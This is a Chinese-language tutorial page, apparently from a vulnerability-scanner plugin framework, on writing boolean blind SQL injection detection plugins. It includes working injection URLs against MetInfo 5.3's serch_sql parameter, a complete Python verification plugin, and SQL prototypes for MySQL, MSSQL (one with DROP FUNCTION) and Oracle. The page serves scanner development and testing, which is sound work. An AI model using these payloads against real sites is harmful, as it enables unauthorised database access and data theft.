我的书签
添加书签
移除书签布尔盲注类插件
这一类的注入在返回页面中没有回显,但可以根据返回页面的结果判断构造的SQL条件语句的真假性。
MySQL 数据库
方法:构造布尔表达式来影响返回结果集。
其 SQL 语句原型类似:
select * from table where 1=1;select * from table where 1=2;select * from table where 1>2;select IF(1=1, 1, 2);select IF(1=2, 1, 2);select IF('a'='a', 1, 2);
实例
MetInfo 5.3 /include/global/listmod.php SQL 注入漏洞:
请求的目标 URL:
# 表达式值为真,返回有数据的页面http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4343 -- x&imgproduct=xxxx# 表达式为假,返回无数据的页面http://127.0.0.1/MetInfo/news/news.php?lang=cn&class2=5&serch_sql=123qwe where 4343=4342 -- x&imgproduct=xxxx
漏洞验证(伪代码):
md5(233) 的值为 e165421110ba03099a1c0393373c5b43
if 表达式为真的请求返回内容:security_hole(target, log=log)
范例插件:
#!/usr/bin/env python# -*- coding: utf-8 -*-# author: Medici.Yanimport redef assign(service, arg):if service == fingerprint.metinfo:return True, argdef audit(arg):# 开发者可调用自定义函数verify(arg)def verify(url):payloadtrue = "{target}/news/index.php?"\"serch_sql=%20123qwe%20"\"where%201234%3D1234%20--%20x&imgproduct=xxxx".format(target=url)payloadfalse = "{target}/news/index.php?"\"serch_sql=%20123qwe%20"\"where%201234%3D1235%20--%20x&imgproduct=xxxx".format(target=url)try:code1, head1, body1, redirect_url1, log1 = hackhttp.http(payloadtrue)# shownews.php?lang= 就是两次请求结果中不同的地方if code1 != 200 or not\re.search('href=["\' ]shownews\.php\?lang=', body1, re.M):returncode2, head2, body2, redirect_url2, log2 = hackhttp.http(payloadfalse)if code2 != 200 or\re.search('href=["\' ]shownews\.php\?lang=', body2, re.M):returnsecurity_hole("%s" % (payloadtrue), log=log1)except:passif __name__ == '__main__':from dummy import *audit(assign(fingerprint.metinfo, 'http://127.0.0.1/MetInfo/')[1])
MSSQL 数据库
方法:构造布尔表达式
其 SQL 语句原型类似:
select * from xxxx where id=xxx and 1=1;select * from xxxx where id=xxx and 1=2;IF(1=1) SELECT 123 ELSE DROP FUNCTION xxxx;
Oracle 数据库
方法:构造布尔表达式
SQL 语句原型类似:
(SELECT (CASE WHEN (1=1) THEN 123 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
